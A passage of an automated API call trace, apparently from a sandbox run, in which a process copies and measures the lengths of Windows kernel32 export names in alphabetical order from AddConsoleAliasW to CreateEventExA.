out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0178.526] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0178.526] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0178.526] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0178.526] lstrcpyA (in: lpString1=0x239db34, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0178.526] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0178.527] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0178.527] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0178.527] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0178.527] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0178.527] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0178.527] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0178.527] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0178.527] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0178.527] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0178.527] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0178.527] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0178.527] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0178.527] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0178.527] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0178.527] lstrlenA (lpString="BACKUPREAD") returned 10 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0178.527] lstrlenA (lpString="BACKUPSEEK") returned 10 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0178.527] lstrlenA (lpString="BACKUPWRITE") returned 11 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0178.527] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0178.527] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0178.527] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0178.528] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0178.528] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0178.528] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0178.528] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0178.528] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0178.528] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0178.528] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0178.528] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0178.528] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0178.528] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0178.528] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0178.528] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0178.528] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0178.528] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0178.528] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0178.528] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0178.528] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0178.528] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0178.528] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0178.529] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0178.529] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0178.529] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0178.529] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0178.529] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0178.529] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0178.529] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0178.529] lstrlenA (lpString="BEEP") returned 4 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0178.529] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0178.529] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0178.529] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0178.529] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0178.529] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0178.529] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0178.529] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0178.529] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0178.529] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0178.529] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0178.529] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0178.529] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0178.530] lstrlenA (lpString="CANCELIO") returned 8 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0178.530] lstrlenA (lpString="CANCELIOEX") returned 10 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0178.530] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0178.530] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0178.530] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0178.530] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0178.530] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0178.530] lstrlenA (lpString="CHECKELEVATION") returned 14 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0178.530] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0178.530] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0178.530] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0178.530] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0178.530] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0178.530] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0178.530] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0178.530] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0178.530] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.530] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.530] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.530] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.531] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.531] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.531] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.531] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.531] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.531] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.531] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.531] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.531] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.531] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.531] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.531] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.531] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.531] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.531] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.531] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.531] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.531] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.531] lstrcpyA (in: lpString1=0x239db34, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.531] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.532] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.532] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.532] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.532] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.532] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.532] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.532] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.532] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.532] lstrlenA (lpString="COPYFILEA") returned 9 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.532] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.532] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.532] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.532] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.532] lstrlenA (lpString="COPYFILEW") returned 9 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.532] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.532] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.532] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.532] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.532] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.532] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.533] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.533] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.533] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.533] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.533] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.533] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.533] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.533] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.533] lstrcpyA (in: lpString1=0x239db34, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.533] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.533] lstrcpyA (in: 